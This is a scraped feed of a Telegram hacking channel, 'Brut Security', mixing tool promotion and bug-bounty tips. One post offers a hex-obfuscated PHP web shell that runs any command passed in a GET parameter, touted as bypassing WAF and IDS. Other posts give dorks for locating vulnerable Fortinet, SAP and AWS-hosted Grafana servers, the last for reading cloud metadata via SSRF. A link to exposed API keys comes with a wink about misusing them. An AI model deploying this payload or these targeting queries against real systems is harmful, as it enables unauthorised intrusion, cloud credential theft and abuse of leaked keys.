Brut Security
14.8K subscribers
921 photos
73 videos
287 files
977 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
Where is the reactions guys ๐Ÿ‘€๐Ÿ™‚
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ32๐Ÿ‘10๐Ÿ‘จโ€๐Ÿ’ป7๐Ÿณ6โค2๐Ÿซก1
Hey Hunters,
DarkShadow back at it again, dropping something many of you probably never noticed! ๐Ÿ˜

Did you know your Chrome DevTools is actually a webpage itself? ๐Ÿ˜ฒ

๐ŸŒ€ URL:
devtools://devtools/bundled/devtools_app.html


Yup, you read that right.

Try this:
๐Ÿ”ฅ Open the URL
๐Ÿ”ฅ Then hit F12 inside DevTools
๐Ÿ”ฅ BOOM โ€” you're debugging the DevTools itself ๐Ÿคฏ

Ever seen DevTools inside DevTools?
Welcome to the Devception ๐Ÿ˜ˆ

Let me know in the comments โ€”
Who just learned this for the first time?๐Ÿ’€

If you enjoy the kind of content I share, show some loveโ€”like, comment, and share it with your hacker fam.


#bugbountytips
๐Ÿ‘จโ€๐Ÿ’ป16โค12๐Ÿ”ฅ4
Brut Security
๐ŸšจIntroducing BrutDroid โ€“ The Ultimate Android Emulator Automation Toolkit๐Ÿšจ โœจRoot, Bypass, Intercept โ€” all in just a few clicks. โœจPowered by Frida, Magisk & Burp. Designed for Hackers. ๐Ÿ’ฅAutomate your mobile testing workflow. ๐Ÿ’ฅClean UI, real power, zero hassle.โ€ฆ
๐Ÿ“ข Heads up, folks!

Just released BrutDroid recently โ€” an automation toolkit for Android emulator testing. Put in a ton of effort, but honestly, the response hasnโ€™t been as strong as expected.

Might make it private soon. If youโ€™re planning to use it or have feedback, nowโ€™s the time! Would love your thoughts.
โš™๏ธ

โš ๏ธhttps://github.com/Brut-Security/BrutDroid/

๐Ÿ’ฌ Feel free to DM or tag me with suggestions.

โ€” Stay Brut.
Please open Telegram to view this post
VIEW IN TELEGRAM
โค31
๐Ÿ˜†Showing off for first time ๐Ÿ˜๐Ÿ˜๐Ÿ˜
Please open Telegram to view this post
VIEW IN TELEGRAM
4๐Ÿคฃ30๐Ÿ˜2๐Ÿ˜ฑ2โค1
๐Ÿ“ฃ Free 15-Day ZoomEye Membership for Brut Security Members!

๐ŸŽ‰ ZoomEye โ€” one of the most widely used cyberspace search engines for security researchers โ€” is offering a 15-day free trial of their Personal Membership exclusively to the Brut Security community.

Perfect for anyone involved in:
โญ๏ธ Bug bounty & recon
โญ๏ธ Red teaming & OSINT
โญ๏ธ Cybersecurity research & learning

โ‰๏ธ How to claim your free trial:
โžก๏ธ Follow ZoomEye on X: https://x.com/zoomeye_team
โžก๏ธ Send them a DM with the message:
โœ๏ธ Brut Security
โžก๏ธ Theyโ€™ll activate your 15-day trial access โ€” no payment required.

Take advantage of this opportunity and explore ZoomEyeโ€™s premium features!

#BrutSecurity #ZoomEye
Please open Telegram to view this post
VIEW IN TELEGRAM
โค8
โค7
Brut Security
Photo
๐ŸŒ€I made this payload that able to bypass WAF even IDS to execute RCE๐Ÿ’€

<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>



๐Ÿ‘€Hex decode:

if($x_=$_GET[0]){system($x_);
}


๐Ÿคซ DarkShadow's secret payload don't share outside โ˜ 
โค20๐Ÿ—ฟ8๐Ÿ‘3๐Ÿค”2
Hey Hunter's,
Here's allll useful commands check it out ๐Ÿ”ฅ
โค13๐Ÿซก6๐Ÿค2
CVE-2025-32756: Buffer Overflow in Fortinet products, 9.8 rating ๐Ÿ”ฅ

Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/nmu5K
๐Ÿ‘‰ Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"

Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
1๐Ÿ”ฅ8โค4๐Ÿซก1
Hey Hunter's,
DarkShadow here back again, just dropping a simple FOFA dork that i made to find all Grafana vulnerable versions which are using AWS and that help to you read all cloud metadata through Grafana SSRF CVE-2025-4123

FOFA dork:
app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0" body="Grafana v10.0.1" body="Grafana v10.0.2" body="Grafana v10.0.3" body="Grafana v10.0.4" body="Grafana v10.0.5" body="Grafana v10.0.6" body="Grafana v10.0.7" body="Grafana v10.0.8" body="Grafana v10.0.9" body="Grafana v10.0.10" body="Grafana v10.0.11" body="Grafana v10.0.12" body="Grafana v10.1.0" body="Grafana v10.1.1" body="Grafana v10.1.2" body="Grafana v10.1.3" body="Grafana v10.1.4" body="Grafana v10.1.5" body="Grafana v10.1.6" body="Grafana v10.1.7" body="Grafana v10.1.8" body="Grafana v10.1.9" body="Grafana v10.1.10" body="Grafana v10.2.0" body="Grafana v10.2.1" body="Grafana v10.2.2" body="Grafana v10.2.3" body="Grafana v10.2.4" body="Grafana v10.2.5" body="Grafana v10.2.6" body="Grafana v10.2.7" body="Grafana v10.3.0" body="Grafana v10.3.1" body="Grafana v10.3.2" body="Grafana v10.3.3" body="Grafana v10.3.4" body="Grafana v10.3.5" body="Grafana v10.4.0" body="Grafana v10.4.1" body="Grafana v10.4.2" body="Grafana v10.4.3" body="Grafana v10.4.4" body="Grafana v10.4.5" body="Grafana v10.4.6" body="Grafana v10.4.7" body="Grafana v10.4.8" body="Grafana v10.4.9" body="Grafana v10.4.10" body="Grafana v10.4.11" body="Grafana v10.4.12" body="Grafana v10.4.13" body="Grafana v10.4.14" body="Grafana v10.4.15" body="Grafana v10.4.16" body="Grafana v10.4.17" body="Grafana v11.0.0" body="Grafana v11.0.1" body="Grafana v11.0.2" body="Grafana v11.0.3" body="Grafana v11.0.4" body="Grafana v11.0.5" body="Grafana v11.1.0" body="Grafana v11.1.1" body="Grafana v11.1.2" body="Grafana v11.1.3" body="Grafana v11.1.4" body="Grafana v11.2.0" body="Grafana v11.2.1" body="Grafana v11.2.2" body="Grafana v11.2.3" body="Grafana v11.3.0" body="Grafana v11.3.1" body="Grafana v11.3.2" body="Grafana v11.3.3" body="Grafana v11.4.0" body="Grafana v11.4.1" body="Grafana v11.4.2" body="Grafana v11.4.3" body="Grafana v11.5.0" body="Grafana v11.5.1" body="Grafana v11.5.2" body="Grafana v11.5.3" body="Grafana v11.5.4" body="Grafana v11.5.5" body="Grafana v11.5.6" body="Grafana v11.6.0" || body="Grafana v12.0.0")


Grep the full dork in comment ๐Ÿ”ฅ

#dork #fofa #bugbountytips 
โค18๐Ÿ”ฅ7๐Ÿ‘2๐Ÿ—ฟ1
55,899 results ๐Ÿ’€
๐Ÿ‘14๐Ÿ”ฅ7โค1
CVE-2025-42989: Missing Authorization in SAP NetWeaver, 9.6 rating ๐Ÿ”ฅ

One of the vulnerabilities disclosed in a recent patch allows an authenticated user to escalate their privileges, which could critically impact the integrity and availability of the system.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/lB0fI
๐Ÿ‘‰ Dork: http.body:"This error page was generated by SAP Web Dispatcher!"

Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html
โค6๐Ÿ˜ฑ4
Brut Security
https://www.unsecuredapikeys.com/
Your know, what you have to do ๐Ÿ˜
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿค10๐Ÿ”ฅ3
Brut Security pinned ยซ๐ŸšจIf you're looking for accurate IoT results, then Sign Up On @Netlas ๐Ÿ˜ฎโ€๐Ÿ’จhttps://app.netlas.io/ref/9cc61538/ยป
๐Ÿคฃ46โค3๐Ÿ”ฅ3๐Ÿ˜ข1